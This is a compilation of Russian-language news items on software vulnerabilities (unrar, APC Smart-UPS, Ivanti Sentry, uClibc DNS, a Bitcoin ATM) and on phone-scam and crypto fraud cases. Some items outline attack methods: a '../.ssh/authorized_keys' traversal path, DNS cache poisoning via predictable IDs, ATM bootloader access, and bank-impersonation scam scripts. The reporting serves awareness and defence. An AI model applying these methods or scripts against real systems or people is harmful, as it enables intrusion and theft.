В утилите unrar выявлена [уязвимость](http://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2022-30333) ([CVE-2022-30333](https://security- tracker.debian.org/tracker/CVE-2022-30333)), позволяющая при распаковке специально оформленного архива перезаписать файлы вне текущего каталога, насколько это позволяют права пользователя. Проблема устранена в выпусках RAR 6.12 и unrar 6.1.7. Уязвимость проявляется в версиях для Linux, FreeBSD и macOS, но не затрагивает сборки для Android и Windows.
Проблема вызвана отсутствием должной проверки последовательности "/.." в файловых путях, указанных в архиве, что позволяет при распаковке выйти за границы базового каталога. Например, разместив в архиве "../.ssh/authorized_keys" атакующий может попытаться перезаписать файл пользователя "~/.ssh/authorized_keys" в момент распаковки.
Исследователи из Armis обнаружили 0-day в семействе продуктов дочерней компании Schneider Electric - производителя APC SmartConnect и Smart-UPS, которые отслеживаются как TLStorm, позволяющих получить контроль над источниками бесперебойного питания (UPS).
Уязвимые системы APC Smart-UPS популярны в самых разных сферах деятельности, включая госсектор, здравоохранение, промышленность, ИТ и сфера торговли. Кроме того, устройства ИБП функционируют в качестве аварийного резервного питания в критически важных средах, таких как центры обработки данных, промышленные объекты, больницы и пр.
Две уязвимости, CVE-2022-22805 и CVE-2022-22806, связаны с реализацией протокола TLS (Transport Layer Security), который подключает устройства Smart- UPS с функцией SmartConnect к облаку управления Schneider Electric.
При этом уязвимости в TLS в реальности более серьезны, поскольку они могут быть реализованы злоумышленником в ходе атак с нулевым щелчком. Одна из ошибок представляет собой обход аутентификации, другая относится к повреждению памяти. Обе уязвимости вызваны неправильной обработкой ошибок TLS в подключении от Smart-UPS к серверу Schneider Electric, и при должном использовании приводят к удаленному выполнению кода.
Третья, CVE-2022-0715, относится к прошивке устройств APC Smart-UPS, которая не имеет криптографической подписи и ее подлинность невозможно проверить при установке в систему. Несмотря на то, что микропрограмма зашифрована, в ней отсутствует криптографическая подпись, что позволяет злоумышленникам создавать ее вредоносную версию и доставлять ее в качестве обновления на целевые устройства ИБП для удаленного выполнения кода (RCE).
Исследователям Armis удалось воспользоваться уязвимостью и создать вредоносную версию прошивки APC, которая была принята устройствами Smart-UPS в качестве официального обновления.
Учитывая, что уязвимые ИБП APC используются примерно в 8 из 10 компаний (по данным Armis), особенно в критических средах (медицинские учреждения, сеть АСУ ТП, серверные помещения), атаки могут причинить серьезный материальный ущерб.
Для понимания масштаба угроз исследователи из Armis наглядно продемонстрировали на видео , как уязвимости могут быть использованы удаленным злоумышленником.
Настоятельно рекомендуем ознакомиться с полным техническим [отчетом](https://info.armis.com/rs/645-PDC-047/images/Armis-TLStorm- WP%20%281%29.pdf) и следовать рекомендациям по защите устройств ИБП: установить исправления, сменить пароль ПСУ по умолчанию (apc) и установить сертификат SSL с открытой подписью и использовать списки управления доступом (ACL).
• Video:
В городе Кривой Рог Днепропетровской области полиция под процессуальным руководством прокуратуры выявила и ликвидировала мошеннический колл-центр. Об этом сообщает "Днепр Оперативный" со ссылкой на Днепропетровскую областную прокуратуру.
По данным следствия, в Кривом Роге группа лиц организовала мошеннический колл- центр, работники которого под видом сотрудников банков вводили обманывали людей и получали их номера банковских карт, CVV-коды, SMS-коды, одноразовые пароли. С помощью этой информации злоумышленники завладели средствами потерпевших.
Во время проведения обыска в нежилом помещении, где функционировало заведение, правоохранительными органами изъято более 20 компьютеров, видеорегистраторы, маршрутизаторы и другая техника. В настоящее время устанавливается весь круг причастных к преступлению лиц.
*****
На улице Ришельевской в Одессе разоблачили мошеннический колл-центр. В среду, 1 декабря, правоохранители ворвались в офис нелегальной организации и провели там обыск.
Об этом сообщает корреспондент 048.ua, который стал свидетелем события. Сегодня, 3 декабря, пресс-служба полиции опубликовала подробности об обыске в колл-центре. Как выяснилось, правоохранителям удалось разоблачить две мошеннические организации.
Оказалось, что данные колл-центры под предлогом предоставления банковских услуг и денежных вкладов в криптовалюту и другие активы получали от граждан иностранных стран, в частности Германии, Польши, Чехии, Италии и России, данные банковских карт и с помощью электронно-вычислительной техники снимали с них деньги.
По местам расположения мошеннических контор были проведены санкционированные Киевским районным судом города Одессы обыски, в ходе которых правоохранители изъяли всю оргтехнику, мобильные телефоны и другие вещественные доказательства преступной деятельности.
В настоящее время правоохранители снимают информацию с изъятой техники, устанавливают полный круг лиц, причастных к данным аферам, обманутых граждан и сумму нанесенного им ущерба.
Мероприятия проводятся сотрудниками Следственного управления ГУНП в Одесской области при оперативном сопровождении работников Управления миграционной полиции Одесской области и Управления уголовного розыска под процессуальным руководством областной прокуратуры в рамках производства, начатого по ч.3 ст.190 (Мошенничество) Уголовного кодекса Украины.
Телефонных мошенников объединили в сообщество.
По делу ОПС проходит 14 обвиняемых и 240 потерпевших.
Как стало известно “Ъ”, в Пресненском суде Москвы начался процесс по делу четырнадцати предполагаемых участников организованного преступного сообщества (ОПС), специализировавшегося на телефонных мошенничествах. Одним из руководителей ОПС, по версии следствия, является Дмитрий Шолдышев, выданный правоохранительными органами Белоруссии по запросу Генпрокуратуры России весной 2021 года. Участникам преступного сообщества инкриминируется хищение денежных средств с банковских счетов граждан. В большинстве случаев махинаторы представлялись сотрудниками кредитных учреждений. В материалах дела 240 потерпевших, причиненный им ущерб составил 84,6 млн руб.
На судебном процессе по делу преступного сообщества в настоящее время представитель прокуратуры оглашает обвинительное заключение. Это займет не одно заседание, поскольку документ насчитывает более 500 страниц машинописного текста.
Как следует из материалов уголовного дела, оно было возбуждено по ч. 1 ст. 210 УК РФ (создание преступного сообщества в целях совершения тяжких или особо тяжких преступлений) главным следственным управлением ГУ МВД по Москве летом 2021 года. Руководство ОПС, по версии полицейского следствия, осуществлялось Дмитрием Шолдышевым, Артемом Либеровым, Никитой Батвинским и неким Балаяном (находится в розыске).
Целью преступного сообщества, структурно разделенного на четыре группы, по материалам дела, являлось хищение средств с банковских счетов граждан. Схемы обмана потерпевших были непритязательны и схожи, показательным примером является случай с одной из жительниц Екатеринбурга. По материалам дела, в разгар пандемии, в июле 2020 года телефонные мошенники с одного из абонентских номеров, на который была установлена переадресация с номера IP-телефонии, позвонили потерпевшей на ее мобильник.
Они представились сотрудниками службы безопасности ПАО «Банк "Екатеринбург"» и сообщили жертве о том, что зафиксировали несанкционированные трансакции с банковской карты женщины.
При этом ей предложили помощь в отмене действий пока не установленных злоумышленников по переводу ее средств. Жительница Екатеринбурга согласилась. После этого у нее потребовали назвать номер банковской карты и СVC-код, расположенный на обратной стороне. Екатеринбурженка, будучи уверенной, что и на самом деле общается с работником службы безопасности банка, передала мошенникам все затребованные реквизиты своей карты, а заодно и предоставила возможность распоряжаться денежными средствами в онлайн-режиме.
Получив таким образом доступ к деньгам, мошенники вышли через интернет на сайт магазина ООО «Сеть Связной» и дистанционно оформили заказ на члена ОПС Никиту Батвинского на приобретение различных мобильных телефонов Apple iPhone в столице. Оплата была произведена банковской картой потерпевшей.
Затем, по материалам дела, Дмитрий Шолдышев отдал распоряжение Никите Батвинскому и Артему Либерову забрать айфоны из магазинов «Связного», расположенных по разным адресам в городе и области. Те, впрочем, не желая появляться в салонах, где установлено видеонаблюдение, лично, как следует из материалов дела, сделали заказ на доставку товара. По поручению фигурантов, говорится в материалах расследования, дорогостоящие мобильные телефоны из магазинов доставляли в ТК «Горбушкин двор», где их реализацией, по данным следствия, занимался Артем Либеров. Полученные от продажи денежные средства мошенники делили между собой в зависимости от роли того или иного предполагаемого участника ОПС в отдельно взятой афере (распределением доходов, по материалам дела, занимался скрывшийся Балаян).
Другой распространенной схемой хищения средств граждан, по версии полицейского следствия, была следующая.
Представляясь сотрудником службы безопасности банка, злоумышленник сообщал потенциальной жертве, что ее банковский счет взломан и, чтобы сохранить средства, необходимо перевести их на другой, безопасный, реквизиты которого мошенник тут же и указывал.
При этом махинаторы на протяжении разговора оказывали на жертву постоянное психологическое давление, чтобы ускорить процесс перевода денег, при этом заверяя, что «преступники» будут непременно изобличены.
В рамках расследования уголовного дела о преступном сообществе следствие установило 240 потерпевших из разных регионов России, у которых, как подсчитали полицейские, фигуранты похитили в общей сложности 84,6 млн руб.
• Source: https://www.kommersant.ru/doc/6379106
Сначала стандартный заход — звонок от представителя отдела закупок Мосметро в
компанию «Нижегородец Восток».
Неизвестная представилась Мариной Гордеевой и заказала 4 машины: черный EXEED
VX, серый GEELY MONJARO, белые HAVAL F7 и HAVAL F7X.
Дальше общались через электронку. Причем адрес крупного заказчика не вызвал
подозрений «gordeeva - zakup @ mosmetro. trade».
Оплату договорились произвести в течении 10 дней.
31 октября за машинками приехали эвакуаторы во главе с неким Василием
Гордеевым, который предъявил вполне правдоподобную гендоверенность от
Метрополитена и забрал тачки.
Ущерб автодилер оценил почти в 17 млн. рублей.
Компания Google [опубликовала отчёт](https://security.googleblog.com/2023/07/the-ups-and-downs-of-0-days- year-in.html) о 0-day уязвимостях, эксплоиты для которых появились раньше, чем были разработаны исправления для связанного с ними уязвимого ПО. За 2022 год командой Project Zero была выявлена 41 подобная уязвимость, что на 40% меньше, чем было найдено в 2021 году (69 0-day уязвимостей). Несмотря на заметное снижение числа 0-day уязвимостей по сравнению с 2021 годом, их число продолжает превышать средние показатели предыдущих 6 лет.
Появлению большого числа 0-day уязвимостей потенциально способствуют такие факторы, как сохранение потребности злоумышленников в 0-day эксплоитах для совершения атак и упрощение методов поиска подобных уязвимостей: повышение оперативности применения исправлений вынуждает искать 0-day уязвимости, а не пользоваться уже известными проблемами; недостаточно качественная разработка исправлений позволяет авторам эксплоитов находить новые векторы атаки для уже известных уязвимостей.
Например, более 40% (17 из 41) из выявленных в 2022 году 0-day эксплоитов были связаны с ранее публично раскрытыми и исправленными уязвимостями. Подобная возможность возникает из-за недостаточно полного или некачественного исправления уязвимостей - разработчики уязвимых программ часто устраняют лишь частный случай или просто создают видимость исправления, не докапываясь до корня проблемы. Подобных 0-day уязвимостей потенциально можно было избежать при более тщательном изучении и исправлении уязвимостей.
Снижение числа 0-day уязвимостей по сравнению с 2021 годом может объяснятся тем, что для создания 0-day эксплоитов требуется больше времени, знаний и денег, число пригодных для эксплуатации уязвимостей снижается из-за более активного применения методов защиты, для каждого эксплоита часто приходится разрабатывать новую технику эксплуатации. Снижение числа 0-day уязвимостей также может быть связано с использованием более простых методов атак, таких как фишинг и распространение вредоносного ПО. Так же может влиять возможность обойтись эксплоитами к уже известным уязвимостям из-за затягивания пользователями применения исправлений.
В отчёте делается вывод, что эксплоиты для n-day уязвимостей, для которых уже выпущены исправления, в экосистеме платформы Android оказываются не менее эффективными, чем 0-day уязвимости, из-за запаздывания поставщиков с формированием обновлений. Например, даже если Google оперативно устранит уязвимость в основной платформе Android, исправление этой уязвимости может быть доведено до большей части пользователей лишь спустя месяцы, так как производители конечных устройств часто запаздывают с переносом исправлений в свои редакции прошивок.
В качестве примера приводится уязвимость CVE-2022-3038, выявленная в движке браузера Chrome 105 и устранённая в июне 2022 года. Данная уязвимость долгое время оставалась неисправленной в специфичных для отдельных производителей браузерах, таких как Samsung Internet. В декабре 2022 года были выявлены факты атак на пользователей Samsung, применяющих эксплоит для данной уязвимости (в декабре актуальный выпуск браузера Samsung Internet продолжал использовать движок Chromium 102, выпущенный в мае 2022 года).
При этом для браузеров также наблюдается смещение интересов создателей эксплоитов в пользу 0-click уязвимостей вместо 1-click. Под 0-click подразумеваются уязвимости, не требующие действий от пользователя, обычно затрагивающие другие компоненты, а не сам код браузера. Например, в вышеупомянутом эксплоите помимо уязвимости CVE-2022-3038 в движке Chromium, которая позволяла обойти ограничение sandbox, была задействована ещё одна уязвимость CVE-2022-22706 в драйвере GPU ARM Mali, которая была исправлена компанией ARM в январе 2022 года, но осталась неисправленной в прошивках Samsung. Более того, несмотря на то, что первые эксплоиты для уязвимости в драйвере Mali появились ещё в январе 2022 года, в прошивке Samsung уязвимость CVE-2022-22706 была устранена только в мае 2023 года, а в Android Security Bulletin данная проблема была отражена в июне 2023 года, т.е. спустя 17 месяцев после публикации патча компанией ARM.
Исследователи безопасности из FortiGuard Labs обнаружили, что злоумышленники обнаружили новый способ обмана интернет-пользователей — они регистрируют домены с расширением «.ZIP», которое обычно используется для сохранения сжатых файлов.
TLD-домены или «домены верхнего уровня» представляют из себя конечный сегмент доменного имени, такой как «.COM», «.ORG» или «.NET» и т.д. Со временем появились сотни так называемых «общих TLD» или «gTLD», которые предлагают индивидуальные адреса для организаций и пользователей, которые соответствуют их бренду, например «Z.cash», «X.team» или «Vacation.rentals».
Согласно отчёту FortiGuard, Общие TLD открыли новые возможности для использования злоумышленниками, а доступность доменов «.ZIP» для покупки значительно расширила возможности использования. Появление gTLD уже затруднило обнаружение фишинговых атак. Теперь добавление домена «.ZIP» создаёт путаницу среди неопытных пользователей.
Например, домен «businesscentral[.]zip», который появился 15 мая, сразу же скачивал на компьютер посетителя вредоносный файл с названием «file.exe». Другой домен, «chatgpt[.]zip», который зарегистрировали 20 мая, предлагал скачать архив с последней версией чат-бота ChatGPT, но в архиве, разумеется, лежал вредоносный файл.
Забавная записка хакеров, «поймавших» свою жертву
Еще один домен, «assignment[.]zip», перенаправлял пользователей на пустые архивы, а домен «voorbeeld[.]zip» попросту не содержал какого-либо контента. Исследователи отмечают, что за этими доменами пока не зафиксировано вредоносной активности, однако они могут быть использованы для этого в будущем.
Один из реальных примеров угрозы — домен «42[.]zip», который тоже появился в Сети 15 мая. Он сразу же скачивает вредоносный файл, называемый «ZIP-бомба», ведущую к распаковке огромного массива данных, который занимает всё доступное пространство на компьютере жертвы.
Чтобы защититься от таких атак, эксперты FortiGuard Labs советуют пользователям блокировать домены «.ZIP» на своих брандмауэрах, использовать веб-фильтры и браузерные расширения для проверки сайтов, а также всегда смотреть на URL-адреса перед тем, как на них переходить. Особенно если их отправил посторонний пользователь.
Также нужно регулярно обновлять антивирусное ПО, операционные системы, браузеры и прочий установленный софт, чтобы закрыть все потенциальные дыры в безопасности вашего компьютера.
Количество хищений денег с банковских счетов в 2021 году увеличилось более чем на 70%. Об этом в своем Telegram-канале проинформировала пресс-секретарь МВД Ольга Чемоданова.
"В Беларуси остается острой проблема хищений денег со счетов. Из 10 тыс. киберпреступлений, совершенных в стране за семь месяцев, на их долю приходится почти 9 тыс. По сравнению с аналогичным периодом прошлого года количество таких хищений увеличилось более чем на 70%. Основная причина успеха злоумышлеников - излишняя доверчивость и недостаточная цифровая грамотность потерпевших", - отметили в ведомстве.
В главном управлении по противодействию киберпреступности решили в очередной раз напомнить людям о типичных схемах аферистов. "Одна из самых актуальных - звонок якобы от правоохранителей. Неизвестный представляется милиционером, называет фамилию, имя, отчество, звание и должность - данные действующих сотрудников размещены в открытом доступе на официальных сайтах госорганов (а может назвать и вымышленные ФИО). Как правило, под предлогом защиты банковского счета просит предоставить реквизиты доступа к нему. В этой схеме аферист надеется на стрессовую ситуацию, в которой оказывается жертва, и ее секундное замешательство", - рассказали в МВД.
"В ГУПК МВД на днях обратились два человека, которых пытался обмануть аферист. В обоих случаях он представлялся сотрудником "управления К", называя ФИО несуществующего человека. Далее следовал классический "развод": якобы банковский счет жертвы под угрозой, для блокировки действий злоумышленников необходимо назвать комбинацию цифр на платежной карте. Мошенник остался ни с чем. В первом случае девушка сразу закончила разговор, так как была наслышана о подобных махинациях. Во втором случае директора коммерческой компании спасло только то, что в тот момент у него при себе не оказалось карточки. Но позже, когда он все-таки понял, с кем имел дело, позвонил в милицию и сообщил о попытке "развода", - сказали в ведомстве.
Вторая схема, по которой действуют мошенники - это "получение кредита". Аферист звонит, представляется правоохранителем или сотрудником службы безопасности банка и сообщает, что якобы со счета клиента банка кто-то пытается вывести все деньги. Звонящий предлагает совместно поймать преступника: для этого требуется открыть кредитную линию и сообщить реквизиты счета. Если жертва следует алгоритму, то злоумышленник похищает все деньги, оставляя пострадавшего с обязательством погасить полученные кредиты.
Злоумышленники также часто пользуются третьей схемой - получением дистанционного доступа к смартфону. Мошенник под видом работника банка сообщает жертве об угрозе, нависшей над ее банковским счетом. Якобы для защиты данных просит абонента установить на своем телефоне программу удаленного доступа (AnyDesk, TeamViewer и др.) и предоставить ему код доступа. Если жертва соглашается, то аферист получает полный контроль над устройством: как правило, он заходит в приложение интернет-банкинга на смартфоне владельца и переводит деньги на свой счет.
Житомирянин назвал мошеннику, который представился работником службы безопасности банка, данные банковской карты и потерял более 100 тысяч гривен. Более 13 тысяч сняли мошенники и с карточки жителя Малинской общины. Начаты досудебные расследования.
Об этом сообщается на сайте ГУНП в Житомирской области.
"25 августа в полицию обратился 39-летний житель Малинской общины. По словам мужчины, к нему позвонил неизвестный, представился работником банка, услугами которого пользуется заявитель, и сообщил о несанкционированных операциях с его картой и необходимости ее заблокировать. После того, как мужчина выполнил все рекомендации псевдопрацевщика, с его счета было снято более 13 тысяч гривен.
Похожий случай произошел 23 августа с 41-летним житомирянином. Мужчина на другом конце трубки представился работником службы безопасности банка, так же воспользовался доверием заявителя, после чего с его карт были сняты более 100 тысяч гривен. Уже через несколько часов мужчина обратился в полицию ", - говорится в сообщении.
По обоим фактам следователи начали уголовные производства, в рамках которых сейчас устанавливаются личности мошенников.
Сотрудниками межрайонного отдела №5 Управления уголовного розыска МВД по Удмуртской Республике в результате оперативно-розыскных мероприятий задержан 34-летний ижевчанин, подозреваемый в мошенничестве с использованием сети Интернет.
Сотрудниками полиции установлено, что подозреваемый в одной из социальных сетей разместил объявление об оказании содействия в приобретении игр и оформлении премиальной подписки на игровые консоли. Заинтересованные граждане оформляли заказ и переводили ижевчанину денежные средства, однако в последующем услуга им оказана не была, деньги при этом обратно не возвращались.
Полицейскими установлено 18 фактов противоправной деятельности задержанного в отношении жителей 9 различных регионов России. Общий ущерб составил почти 100000 рублей.
Отделом дознания УМВД России по г. Ижевску по всем фактам возбуждены уголовные дела по ч. 1 ст. 159 УК РФ «Мошенничество». В отношении задержанного избрана мера пресечения в виде подписки о невыезде и надлежащем поведении.
В настоящее время сотрудниками полиции устанавливается причастность задержанного к аналогичным фактам мошенничества.
Федеральная комиссия по связи (Federal Communications Commission, FCC) США объявила о принятии новых правил, целью которых является прекращение мошенничества с подменой SIM-карт (SIM Swapping, SIM-свопинг), широко используемом хакерами для получения доступа к личной информации и паролям пользователей. Такая схема привела к убыткам в миллиарды долларов и является предпочтительным методом для многих крупных групп хакеров.
Согласно новым правилам FCC, операторы связи теперь обязаны использовать надёжные методы аутентификации клиентов перед переносом их номеров на новое устройство или к другому провайдеру. Кроме того, провайдеры должны незамедлительно информировать потребителей каждый раз, когда в учетных записях клиентов делается запрос на смену или перенос номера, а также предпринимали дополнительные шаги для защиты от мошенничества с подменой SIM-карты и переносом номера.
Правила, принятые FCC, обновляют существующие положения о защите информации частной сети клиента (Customer Proprietary Network Information, CPNI) и местной переносимости местных номеров (Local Number Portability). Изменения создают единый стандарт безопасности для всей индустрии мобильной связи, предоставляя провайдерам свободу в выборе методов защиты от мошенничества.
FCC также призвала граждан поделиться идеями по дальнейшему усилению защиты от мошенничества при замене SIM-карт и переносе номеров. Предложение распространяется на борьбу с мошенническими схемами, в которых злоумышленники выдают себя за жертву и открывают аккаунты у других операторов, а затем переносят номера на них.
По данным ФБР, только в 2021 году американцы потеряли более $68 млн. из-за атак с подменой SIM-карт. Показатель демонстрирует экспоненциальный рост угрозы с 2018 года, когда ФБР начало отслеживать такого рода атаки.
В FCC подчеркнули, что обновленные правила направлены на усиление контроля абонентов над своими учётными записями и повышение уровня информированности клиентов о любых запросах на перенос SIM-карт, что должно помочь в предотвращении мошеннических действий. Для дальнейшего усиления защиты личных данных клиентов, FCC в этом году создала Рабочую группу по конфиденциальности и защите данных ( Privacy and Data Protection Task Force ). Инициатива направлена на решение проблем, связанных с подменой SIM-карт и других угроз, угрожающих конфиденциальности пользователей.
source:
docs.fcc.gov/public/attachments/DOC-398483A1.pdf
ic3.gov/Media/Y2022/PSA220208
Ivanti Sentry is a gateway that manages and encrypts traffic between mobile devices and underlying systems in a company. There's already a vulnerability named for this CVE-2023-38035 and it seems to be already exploited in the wild.
This product can also be used as a guardian for enterprise ActiveSync servers such as Microsoft Exchange Server or backend resources including Sharepoint servers in MobileIron and can also act as a Kerberos Key Distribution Center Proxy (KKDCP) server. The bug allows unauthenticated attackers to access sensitive APIs exposed through port 8443, which is used by the MobileIron Configuration Service (MICS). The problem is related to the bypass of authentication control, through an insufficiently strict configuration of Apache HTTPD.
An attacker that successfully exploits the bug can change the gateway's configuration, execute system commands, and write arbitrary files on the system. To mitigate risk, organizations should restrict access to the administrator portal to only internal management networks and not to the Internet, Ivanti said.
Source(s): [https://www.darkreading.com/attacks...ritical-vuln-in-its-sentry- gateway-technology](https://www.darkreading.com/attacks-breaches/ivanti- issues-fix-for-critical-vuln-in-its-sentry-gateway-technology)

аутентификации ](https://xakep.ru/2023/08/22/ivanti-sentry-0day/)
Компания Ivanti подготовила внеплановый патч для продукта Ivanti Sentry (ранее MobileIron Sentry). Разработчики предупредили, что критическая уязвимость CVE-2023-38035, которую можно использоваться для обхода аутентификации Sentry API, похоже, уже используется хакерами.
 xakep.ru
Американская компания по разработке программного обеспечения Microsoft прекратит предоставлять возможность российским компаниям продлевать лицензии на свои продукты после 30 сентября. Информацию распространило агентство TelecomDaily, ссылаясь на письмо, отправленное технической поддержкой компании.
Согласно письму, Microsoft больше не будет принимать платежи на местные банковские счета в качестве оплаты своих услуг в России. «В связи с этим, направляя вам уведомление за 60 дней, корпорация Microsoft настоящим уведомляет вас о том, что после 30 сентября 2023 года (дата вступления в силу) вы больше не сможете продлевать свои существующие подписки»,— сказано в сообщении.
Действующие подписки будут действительны до окончания своего срока. Однако,
как указано в сообщении, их продление в будущем будет недоступно.
Microsoft прекратила продажу новых продуктов в России в 2022 году из-за
событий на Украине. Ранее российские представительства международных компаний
и юрлица, не попавшие под санкции, получали предложения о продлении лицензии
на софт корпорации.
В стандартных Си-библиотеках uClibc и uClibc-ng, применяемых во многих встраиваемых и портативных устройствах, [выявлена уязвимость](https://www.nozominetworks.com/blog/nozomi-networks-discovers- unpatched-dns-bug-in-popular-c-standard-library-putting-iot-at-risk/) (CVE не присвоен), позволяющая подставить фиктивные данные в кэш DNS, что можно использовать для подмены в кэше IP-адреса произвольного домена и перенаправления обращений к домену на сервер злоумышленника.
Проблема затрагивает различные Linux-прошивки для маршрутизаторов, точек доступа и устройств интернета-вещей, а также Linux-дистрибутивы для встраиваемых систем, такие как OpenWRT и Embedded Gentoo. Отмечается, что уязвимость проявляется в устройствах многих производителей (например, uClibc используется в прошивках Linksys, Netgear и Axis), но так как в uClibc и uClibc-ng уязвимость остаётся неисправленной, детальные сведения о конкретных устройствах и производителях, в продуктах которых присутствует проблема, пока не разглашаются.
Уязвимость вызвана использованием в коде отправки DNS-запросов предсказуемых идентификаторов транзакции. Идентификационный номер запроса DNS выбирался путём простого увеличения счётчика без применения дополнительной рандомизации номеров портов, что позволяло добиться отравления кэша DNS через упреждающую отправку UDP-пакетов с фиктивными ответами (ответ будет принят, если он пришёл раньше ответа реального сервера и включает корректный ID). В отличие от предложенного в 2008 году метода Каминского, идентификатор транзакции даже не нужно угадывать, так как он изначально предсказуем (вначале выставляется значение 1, которое при каждом запросе увеличивается, а не выбирается случайным образом).
В спецификации для защиты от подбора идентификатора рекомендуется дополнительно применять случайное распределение номеров исходных сетевых портов, с которых отправляются DNS-запросы, что компенсирует недостаточно большой размер идентификатора. При включении рандомизации портов для формирования фиктивного ответа кроме подбора 16 битного идентификатора необходимо подобрать и номер сетевого порта. В uClibc и uClibc-ng подобная рандомизация не включалась явно (при вызове bind не указывался случайный исходный UDP порт) и её применение зависело от настроек операционной системы.
При отключении рандомизации портов определение инкриментируемого идентификатора запроса отмечается как тривиальная задача. Но даже в случае применения рандомизации, атакующему необходимо лишь угадать сетевой порт из диапазона 32768–60999, для чего можно использовать массированную одновременную отправку фиктивных ответов по разным сетевым портам.
Наличие проблемы подтверждено во всех актуальных выпусках uClibc и uClibc-ng, включая самые свежие версии uClibc 0.9.33.2 и uClibc-ng 1.0.40. В сентябре 2021 года информация об уязвимости была отправлена в CERT/CC для согласованной подготовки исправлений. В январе 2022 года данные о проблеме были переданы более 200 производителям, сотрудничающим с CERT/CC. В марте была попытка отдельно связаться с сопровождающим проект uClibc-ng, но он ответил, что не в состоянии исправить уязвимость самостоятельно и рекомендовал публично раскрыть информацию о проблеме, рассчитывая получить помощь в разработке исправления от сообщества. Из производителей о выпуске обновления с устранением уязвимости объявил NETGEAR.
Сотрудники ГБР при содействии внутренней безопасности Нацполиции сообщили о подозрении оперуполномоченной Управления уголовного розыска в Днепропетровской области, которая продавала информацию из межведомственной базы данных.
Об этом сообщает пресс-служба ГБР в г. Полтава.
Сообщники полицейской в социальных сетях предлагали услуги предоставления информации из базы данных Нацполиции и Министерства внутренних дел. Они предоставляли заказчикам данные о пересечении некоторыми лицами государственной границы Украины. Эти данные извлекала из закрытых систем работница уголовного розыска.
6 декабря 2021 г. ГБР сообщило оперуполномоченной о подозрении в несанкционированном копировании информации, обрабатываемой в автоматизированных системах (ч. 2 ст. 362 УК Украины).
Санкция статьи предусматривает наказание в виде лишения свободы сроком до 3 лет.
Досудебное расследование продолжается, устанавливается полный круг лиц, причастных к преступлению.
• Source: [https://dbr.gov.ua/news/dbr-povidom...-prodavala-informaciyu-iz- obmezhenim-dostupom](https://dbr.gov.ua/news/dbr-povidomilo-pro-pidozru- spivrobitnici-karnogo-rozshuku-yaka-prodavala-informaciyu-iz-obmezhenim- dostupom)
Комиссия по ценным бумагам и биржам США (SEC) обвинила гражданина Латвии Иварса Аузинса в организации нескольких мошеннических схем, связанных с криптовалютами.
По данным SEC, в 2018 году Иварс Аузинс (Ivars Auzins) запустил первичное размещение токенов (ICO) под названием Denaro. Мошенник собрал около $11 млн и скрылся с деньгами инвесторов.
В другой схеме под названием Innovamine латвиец обещал инвесторам большие прибыли с «облачного майнинга» криптовалют. В этом случае мошенник присвоил около $7 млн.
Аузинс обвиняется в организации еще шести подобных схем. Гражданин Латвии использовал различные названия проектов и на короткий срок регистрировал компании в Великобритании, чтобы придать им легитимности в глазах инвесторов.
В иске, поданном в суд, SEC требует для Аузинса наложения запрета на участие в любых предложениях ценных бумаг. Также регулятор добивается возврата средств, полученных у американских инвесторов.
• Source: sec.gov/news/press-release/2021-248
Подразделение биржи Kraken, занимающееся исследованиями в области безопасности, опубликовало разбор уязвимостей популярной модели криптомата BATMtwo от General Bytes.
[Согласно статье в блоге Kraken Security Labs](https://blog.kraken.com/post/11263/kraken-security-labs-identifies- vulnerabilities-in-commonly-used-bitcoin-atm/), широко используемая модель криптомата имеет несколько программных и аппаратных уязвимостей. 20 апреля исследовательское подразделение Kraken уведомило производителя криптоматов компанию General Bytes о векторах атак. General Bytes выпустила исправления для серверной системы, однако некоторые исправления могут потребовать доработки оборудования.
Как заявляют исследователи безопасности Kraken, рассматриваемая модель BATMtwo (GBBATM2) имела несколько уязвимостей, включая проблемы с QR-кодом администратора по умолчанию, базовым операционным программным обеспечением Android, системой управления криптоматом и аппаратным корпусом устройства.
Проблемы с QR-кодом администратора
При приобретении криптомата GBBATM2 его новый владелец должен провести настройку устройства с помощью QR-кода «Ключ администрирования», который необходимо отсканировать на криптомате. QR-код, содержащий пароль, необходимо устанавливать отдельно для каждого банкомата в бэкэнд-системе.
Однако при просмотре кода интерфейса администратора исследователи Kraken обнаружили, что он содержит хэш ключа администрирования заводских настроек по умолчанию. Kraken приобрела несколько бывших в употреблении криптоматов из разных источников и выяснила, что каждый из них имеет одинаковую конфигурацию ключей по умолчанию. Это означает, что многие владельцы GBBATM2 не меняли QR- код администратора. Во время тестирования отсутствовала возможность управления ключом администрирования для группы криптоматов, то есть каждый QR-код нужно было менять вручную. Таким образом, любой может взять под контроль криптомат через административный интерфейс, просто изменив адрес сервера управления устройством.
Аппаратное обеспечение
GBBATM2 имеет один отсек, который защищен одним замком. Его вскрытие обеспечивает прямой доступ ко всем внутренним компонентам устройства. Устройство не содержит локальной или серверной сигнализации, предупреждающей других о том, что внутренний отсек был вскрыт. На этом этапе потенциальный злоумышленник может взломать денежный ящик, встроенный компьютер, веб-камеру и сканер отпечатков пальцев.
Программное обеспечение
По словам исследователей, в операционной системе Android BATMtwo отсутствуют многие общие функции безопасности. При подключении USB-клавиатуры к BATM можно получить прямой доступ к полному пользовательскому интерфейсу Android, что позволяет любому устанавливать приложения, копировать файлы или выполнять другие вредоносные действия, например, отправлять злоумышленнику закрытые ключи.
Android поддерживает «режим терминала самообслуживания», который блокирует пользовательский интерфейс в одном приложении, что может помешать получить доступ к другим областям программного обеспечения, однако он не был включен в систему криптомата.
Отсутствие проверки прошивки/программного обеспечения
BATMtwo содержит встроенный компьютер на базе NXP i.MX6. Исследователи Kraken обнаружили, что BATMtwo не использует функцию безопасной загрузки процессора и что его можно перепрограммировать, просто подключив USB-кабель к порту на плате-носителе и включив компьютер, удерживая нажатой кнопку.
Кроме того, загрузчик устройства разблокирован: простого подключения последовательного адаптера к порту UART на устройстве достаточно для получения привилегированного доступа к загрузчику. Исследователи отмечают, что процесс безопасной загрузки многих процессоров i.MX6 [уязвим для атаки](https://blog.quarkslab.com/vulnerabilities-in-high-assurance-boot-of- nxp-imx-microprocessors.html), однако на рынке есть более новые процессоры с исправленной уязвимостью, впрочем они могут быть недоступны из-за глобальной нехватки микросхем
Отсутствие защиты от подделки межсайтовых запросов в серверной части банкомата
Криптоматы BATM управляются с помощью Crypto Application Server (CAS) - программного обеспечения, которое может быть размещено оператором или лицензировано как SaaS. Команда Kraken обнаружила, что CAS не реализует никаких средств защиты от подделки межсайтовых запросов, что позволяет злоумышленнику генерировать аутентифицированные запросы к CAS. Хотя большинство конечных точек защищены очень трудно угадываемыми идентификаторами, исследователи смогли идентифицировать несколько векторов CSRF, которые могут успешно скомпрометировать CAS.
